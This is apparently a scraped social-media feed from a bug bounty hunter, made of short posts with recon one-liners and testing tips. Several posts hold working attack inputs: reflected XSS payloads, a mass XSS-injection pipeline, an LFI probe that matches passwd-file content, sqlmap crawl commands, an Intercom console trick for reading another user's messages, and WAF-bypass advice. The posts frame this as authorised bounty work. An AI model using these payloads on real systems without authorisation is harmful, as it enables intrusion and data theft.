Otterly

@ott3rly

Followers
5,088
Following
240
Media
127
Statuses
951

Bug Bounty Hunger. Helping people to score bounties 💰

Kaunas, Lietuva
Joined November 2016
@ott3rly
Otterly
8 months
Top 3 RXSS payloads I use: `'";//><img/src=x onError="${x};alert(`1`);"> `'";//><Img Src=a OnError=location=src> `'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))> #bugbounty #xss #bugbountytips
6
131
420
@ott3rly
Otterly
4 months
File upload functionality could be very dangerous and could easily get you RCE or XSS. It has a large attack surface so it's a pretty interesting thing to look for. I usually use the following regex on burp history to look for those OR just use the word "upload". #bugbounty
2
56
284
@ott3rly
Otterly
8 months
I hate when a top-tier bug bounty hunter mentions on some podcast that he/she prefers checking sensitive areas of the application, without mentioning where. A lot of beginners need help figuring out how to start and where to look for common issues. Here is my list of critical
4
51
193
@ott3rly
Otterly
9 months
My favorite ways to find API endpoints: 1️⃣ Check if targets have the swagger UI docs using nuclei: cat targets.txt | nuclei -id swagger-api | anew swagger-ui-endpoints.txt 2️⃣ Bruteforcing using dictionaries like or for better
3
56
188
@ott3rly
Otterly
4 months
If you have issues bypassing WAF on POST/PUT/PATCH methods manually, you could try this extension: Absolute game-changer. Credits to @infosec_au for bringing this in for public. #bugbounty
2
58
178
@ott3rly
Otterly
5 months
Whenever I see this icon on the website, I always open the browser dev tools console and paste these: - Intercom('show'); - Intercom('boot',{email:'known_user@gmail.com'}) If I can see messages of another person, it is an easy bounty! #bugbountytips #bugbounty #ethicalhacker
6
35
173
@ott3rly
Otterly
9 months
Checklist 📝 for exploiting Windows IIS targets: ✅ Detect IIS instances - initial step to build wordlist of potential targets: 1️⃣ Nuclei: cat targets.txt | nuclei -silent -id tech-detect | grep "ms-iis" 2️⃣ Shodan dorks: - org:"Target inc." product:"IIS" -
5
64
168
@ott3rly
Otterly
8 months
I earned $3000 on @bugcrowd. Tip: always recheck the endpoints collected on the "targets" tab in Burp. After testing certain functionalities, new endpoints could appear which might lead to interesting findings. #ItTakesACrowd #bugbounty #bugbountytip
2
11
163
@ott3rly
Otterly
4 months
Are you tired of seeing similar requests in Burp Suite HTTP history when working with GraphQL endpoints? Let me show you how to make GraphQL traffic more easily readable: Using HTTP history filtering options - Click on the HTTP history filter icon, and fill in your settings.
2
32
151
@ott3rly
Otterly
8 months
Want to test for SQLi, RCE, but the target is behind annoying WAF? These are ways to find the origin IP, to bypass WAF restrictions: ✅ Check shodan first. Use ssl: or http.favicon.hash:<HASH> dorks to check if there are any results. This method is the
3
37
138
@ott3rly
Otterly
6 months
Sometimes when arjun does not work properly for parameter guessing, I use ffuf instead: ffuf -u "https://target.com/payment.php?FUZZ=regular" -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt #bugbounty #bugbountytip #bugbountytips
5
24
139
@ott3rly
Otterly
4 months
Quick LFI check oneliner for a fresh target: cat targets.txt | (gau || hakrawler || katana || gospider) | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" #bugbounty #infosec
2
36
135
@ott3rly
Otterly
5 months
One-liner to get subdomains from wayback: curl -s 'http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey' | sed -e 's_https*://__' -e "s/\/.*//" | sed 's/www\.//g' | sed 's/:80//g' | sort -u #bugbounty #bugbountytips #cybersecuritytips
1
28
132
@ott3rly
Otterly
8 months
Use this Shodan filter to get more recently added hosts: org:"<Org name>" after:1/1/2024 #BugBounty #informationsecurity #infosec
2
33
122
@ott3rly
Otterly
9 months
As promised, I am sharing my current checklist 📝 for small scope targets (v0.1): - API docs/support pages. Explore functionality to understand the app better. - Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them. -
8
31
115
@ott3rly
Otterly
8 months
I earned $3,000 for my submission on @bugcrowd Tip: always check how the cart handles user input. You can find interesting business logic errors, injections, etc. #ItTakesACrowd #bugbounty #infosecurity
5
4
109
@ott3rly
Otterly
7 months
After playing around with the targeted website, with the proxy on, run this filter to find file uploads: #bugbounty #bugbountytip #bugbountytips
0
17
107
@ott3rly
Otterly
6 months
Do you know that sqlmap has its own crawler? Run it in the background easily: sqlmap -u 'https://target.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12 #appsec #SQLi #hacking
2
26
106
@ott3rly
Otterly
4 months
Tired of seeing those OPTIONS method requests in your burp HTTP history? I have encountered this numerous times, and it has annoyed me a lot. Luckily, I have found the solution. We can use the "HTTP history filter" with "Bambda mode": 1. Go to the proxy tab. 2. On HTTP history,
1
17
104
@ott3rly
Otterly
6 months
Base checklist 📝 for exploiting Tomcat servers: - Detect: → Wappalyzer → Nuclei → Server error - use this to get the version! → Response headers - Test common ports: 8080, 9080, 9443, 9005, 9009, 8082, 8180 - Try clicking on buttons - this is simply stupid but
3
27
102
@ott3rly
Otterly
8 months
Use these commands to parse waymore/gau or any other URL output to find interesting leads: 1️⃣grep -oP '^https?://(?:[^/]*/){2}' waymore.txt | sort -u | tee root-dirs.txt # This output is good for checking different apps of different domains 2️⃣cat waymore.txt | unfurl keys | awk
4
20
93
@ott3rly
Otterly
7 months
Tip: If you are looking for wayback endpoints either by gau or waymore, do not pass the whole subdomain list of a single target. Both of these tools have a subdomain option, use that instead. #bugbounty #bugbountytips #bugbountytip
1
11
89
@ott3rly
Otterly
8 months
I earned $950 for my submission on @bugcrowd Type: Business logic Tip: Try bypassing certain limitations, by using double submit. For example, open 2 browser tabs and try submitting both at the same time. #ItTakesACrowd #bugbounty #ethicalhacking
6
4
87
@ott3rly
Otterly
4 months
Sometimes using Shodan dork :"target" instead of :"" could reveal many more results for the "All in scope" target. Keep in mind that you will need to filter out them later to minimize OOS. #bugbounty #shodan
2
17
83
@ott3rly
Otterly
7 months
I earned $450 for my submission on @bugcrowd Even small bounties stack it up over time! Tip: Bypass product limits using race conditions. Either use the newest version of burp or turbo intruder plugin. #ItTakesACrowd #bugbounty #bugbountytips
4
5
83
@ott3rly
Otterly
1 month
Small tip for those who use xsshunter express as their blind xss framework: If you want to use import() function for your payloads (which is pretty good for some filter bypasses), you need to change the line 197 of probe.js file to var probe_return_data =
2
12
83
@ott3rly
Otterly
9 months
On @Bugcrowd, in January I submitted 6 bugs to 4 programs. Award-wise, it's the most profitable platform so far. #bugbounty #TogetherStronger
5
0
82
@ott3rly
Otterly
9 months
FFUF could be used for fuzzing one endpoint for large amount of alive hosts: cat alive.txt | grep -v "filter" | ffuf -u https://FUZZ/endpoint -w - -fw 1 replace filter and /endpoint with your own :) #bugbounty #bugbountytips #CyberSecurity
1
18
79
@ott3rly
Otterly
8 months
Sometimes Excel files could contain PII leaks, so use this Google dork: site:target.com inurl:'xlsx' OR site:target.com inurl:'xls' #ghacking #googlehacking #dorking
0
20
78
@ott3rly
Otterly
6 months
DotGit Firefox extension could get you some serious P1/P2 vulnerabilities. It's a must-have in your hacker toolkit. Easy bug bounty money! #bugbounty #cybersecuritytips #ethicalhacking
1
6
76
@ott3rly
Otterly
7 months
Use this one-liner to get a lot of fuzz endpoints from the crawler: cat targets.txt | hakrawler -d 5 -dr -insecure -t 10 -timeout 360 | tee hakrawler.txt #bugbounty #bugbountytips #bugbountytip
2
16
76
@ott3rly
Otterly
9 months
One-liner of favicon hash for shodan: python3 -c "import mmh3,requests,codecs;print(mmh3.hash(codecs.encode(requests.get('[URL]',verify=False).content,'base64')))" Replace URL with and use http.favicon.hash:<HASH> #bugbounty #bugbountytips #infosecurity
2
21
72
@ott3rly
Otterly
5 months
Just checked tool from @dorkipty . It can gather data from over 100+ search engines and this is a very cool feature. I know this is a pretty fresh tool, so I am looking forward to getting some updates from the team @fattselimi @badcrack3r . The only thing
2
10
76
@ott3rly
Otterly
4 months
Damn, never thought this way. I have always excluded those. I guess this time I will do some checking as well ;)
@GodfatherOrwa
Godfather Orwa 🇯🇴
4 months
95% of hunters remove pics from endpoints. My steps: gather all target endpoints, filter the results just for pic extensions (cat endpoints.txt | egrep 'jpg|jpeg|png' > results.txt), filter to live ones, send the results to a screenshot tool. 1/2 #bugbountytips #bugbountytip #bugbounty
30
116
715
2
2
75
@ott3rly
Otterly
7 months
I do have an OSCP cert by the way. Has it helped my bug bounty success? Not particularly, but I guess it did have some impact on my initial infosec journey. I eventually transitioned from pen-testing to full-time bug hunting. #offsec #oscp #tryharder
1
2
74
@ott3rly
Otterly
6 months
Check out my new blog post: Make Money 💸 Using Google Hacking #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder
3
20
74
@ott3rly
Otterly
4 months
Get endpoints from the apk file: apktool d app.apk -o uberApk; grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"# #g' | anew | grep -v "w3\|android\|github\|http://schemas\.android\|google\|http://goo\.gl" #bugbounty #appsec #itsecurity
1
19
73
@ott3rly
Otterly
8 months
Base checklist for testing AEM instances 📋: ✅ Identify. 1️⃣ Testing manually ⇒ Check wappalyzer. ⇒ Check the source of page, should see adobe links. 2️⃣ Automated approach ⇒ Google Dorking - site: intitle:content/dam ⇒
0
21
72
@ott3rly
Otterly
11 months
One-liner to find sensitive PDF files on Wayback Machine for multiple domains (in the comments) #bugbountytip #bugbounty #informationsecurity
1
13
70
@ott3rly
Otterly
7 months
Another one-liner to get crawler endpoints: cat targets.txt | gospider -S - -q -d 5 -c 10 --sitemap --no-redirect -o gospider.txt Note: do not use for targets with too many endpoints, like blogs, e-commerce sites, or social media. #bugbounty #bugbountytips #bugbountytip
1
22
69
@ott3rly
Otterly
4 months
One-liner to find JavaScript files quickly using multiple tools: echo target.com | (gau || hakrawler || gospider || katana) | grep -iE '\.js' | grep -iEv '\.(jsp|json)' | anew js.txt #bugbounty #bugbountytips #hackers
2
22
69
@ott3rly
Otterly
1 month
Looks pretty cool. Gonna review this tool on today's stream. This will be a short break from XSS run.
@NahamSec
Ben Sadeghipour
1 month
I scanned a bunch of Vulnerability Disclosure Programs to test their APIs using SwaggerJacker for automated api hacking including: 1️⃣Brute forcing for API documentation 2️⃣ Authorization Issues 3️⃣ Automatically generating wordlists .. and more! 👀👉🏼
8
69
445
2
9
69
@ott3rly
Otterly
5 months
A quick one-liner to get most of the wildcard domains of BBPs: curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/main/chaos-bugbounty-list.json | jq ".[][] | select(.bounty==true) | .domains[]" -r #bugbounty #bugbountytip #bugbountytips
0
15
68
@ott3rly
Otterly
7 months
4 Stages of the Bug Bounty Hunter: - Learning about Bug Bounty -> Finding the First VALID Bug. Gain foundational knowledge, learn about vulnerabilities, methodologies, and try to identify initial vulnerabilities. Register on one or multiple bug bounty platforms like Hackerone,
4
13
66
@ott3rly
Otterly
9 months
Tip of the day - add the following flag to httpx to get more results: -H 'Referer: localhost' Some servers have checks for headers. You could also experiment with other headers like Origin, X-Forwarded-For, etc. #bugbounty #bugbountytips #infosec
0
17
66
@ott3rly
Otterly
8 months
Have a txt file with the list of js endpoints? Use this nuclei command to check for token leaks: cat js-endpoints.txt | nuclei -tags token,tokens -es info #bugbounty #cybersecuritytips #cybersecurity
1
13
64
@ott3rly
Otterly
8 months
Google Dork to check old websites on broad scope target: "© <company>. All rights reserved." -2024 -2023 -2022 #dorking #googlehacking #ghacking #bugbounty
0
12
65
@ott3rly
Otterly
8 months
One-liner to quickly check unusual ports on many hosts using nmap: nmap -iL hosts.txt -Pn --min-rate 1000 --max-retries 1 --max-scan-delay 20ms -T4 --top-ports 1000 --exclude-ports 80,443,53,22,5060,8080 --open -oG nmap.out #bugbounty #networksecurity #nmap
3
12
62
@ott3rly
Otterly
4 months
Quick RXSS check for a fresh target: cat domains.txt | (gau || hakrawler || gospider || katana) | grep -Ev "\.(jpeg|jpg|png|ico|woff|svg)$" | uro | grep = | qsreplace "<img src=x onerror=prompt()>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=prompt()>" #bugbounty #xss
2
6
62
@ott3rly
Otterly
8 months
If you are thinking of a good port scanner that is simple and fast, you could check out https://github.com/nullt3r/jfscan I have tested it and it's pretty accurate. Of course, nothing can replace OG Nmap entirely. #networksec #netsec #infosecurity
0
12
63
@ott3rly
Otterly
6 months
Use this as a base checklist 📝 when testing cart 🛒functionality: 1️⃣ Is it possible to manipulate prices? - Try adding minus items. - Integer overflows. 2️⃣ Test coupon codes. - Add multiple coupon codes. - Race conditions - XSS payloads 3️⃣ postMessage issues. - Is the event
0
22
63
@ott3rly
Otterly
9 months
If you are using gau to fetch some archive data, make sure to exclude a lot of extensions with --blacklist flag: cat t | gau --subs --blacklist png,jpg,jpeg,gif,mp3,mp4,svg,woff,woff2,etf,eof,otf,css,exe,ttf,eot #itsecurity #bugbounty #informationsecurity
1
10
62
@ott3rly
Otterly
9 months
Check out my new blog post: Hunting Blind XSS on the Large Scale — Initial Setup #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder
3
25
61
@ott3rly
Otterly
8 months
Use this Google dork to detect AEM instances: site:target.com inurl:/content/dam/ #bugbounty #googlehacking #dorking
1
8
62
@ott3rly
Otterly
7 months
A quick way to scan for the s3 bucket list: s3scanner -bucket-file s3-buckets.txt -threads 16 | grep -aE 'Read|Write|Full' | tee results.txt #bugbounty #bugbountytip #bugbountytips
0
19
61
@ott3rly
Otterly
4 months
The bug bounty is so addictive!
4
6
60
@ott3rly
Otterly
5 months
Make sure you train your brain every day. Reading writeups helps me keep up with the game. I do recommend checking this list of Bug Bounty blogs by @G0LDEN_infosec: https://raw.githubusercontent.com/g0ldencybersec/bugbountybloglist/main/blogs.txt #bugbounty #bugbountytips
1
11
61
@ott3rly
Otterly
4 months
The options I like to use when getting alive subdomains: cat domains.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -sc -cl -title -t 100 -fr -nc | anew alive.txt
0
11
59
@ott3rly
Otterly
4 months
Find shodan queries from nuclei public templates locally: for i in `grep -aR severity ~/nuclei-templates | grep -Eav 'cves.json|TEMPLATES-STATS.json' | grep -aE 'critical|high' | grep -a http | awk -F ':' '/1/ {print $1}'`; do cat $i | grep shodan-query; done #bugbounty #hacking
1
10
59
@ott3rly
Otterly
4 months
If you see a preview page editor, board, etc., and you are able to edit its contents, try placing the following payload: <script>window.location.replace('https://cnn.com')</script> If the exported doc contains the cnn page, it's vulnerable to an XSS -> SSRF chain. #bugbounty #bugbountytip
1
8
57
@ott3rly
Otterly
3 months
Low and Medium vulnerabilities are usually not as interesting as High and Critical ones, but they can definitely serve as the bread and butter for consistent cash flow. If lows and mediums are the bread and butter, highs and crits are the ham and cheese on the top.
3
3
54
@ott3rly
Otterly
1 month
Pretty good. I was actually thinking to do something similar ;)
@Symbolexe
Yasin
1 month
Bug Bounty Hunting Search Engine I recommend this website to you!
2
109
470
1
6
58
@ott3rly
Otterly
8 months
Another tip for testing RBAC issues: Use the Multi-Account Containers Firefox plugin. It could create a separate browser environment for each account you are testing. Pretty good tool when you have to test more than 2 account roles. #appsec #infosec #hacking
4
11
59
@ott3rly
Otterly
6 months
Another useful thing that sqlmap has is the Google Dorking flag. Combine it with your favorite dork to increase the chance of finding SQLi: sqlmap -g 'site: inurl:\".php?id=1\"' #SQLi #infosecurity #cybersecurity
1
9
56
@ott3rly
Otterly
4 months
You know you had an intense hacking session when your repeater section has that many tabs. Should I update my cover image with this? 😆
8
3
56
@ott3rly
Otterly
7 months
Writing a good bug bounty report will result in bigger bounties! There were some cases when I got high severity instead of medium, just because I had put a lot of effort into constructing quality a report. At the end of the day, the human factor plays a big role in bug bounty
4
10
56
@ott3rly
Otterly
6 months
As promised, I will start doing some live videos after 1k subscribers. The plan is to do a recon part on YouTube and a hacking part on Discord. The main reason for that: hacking on live targets is a pretty grey area under YouTube's terms of service.
4
1
57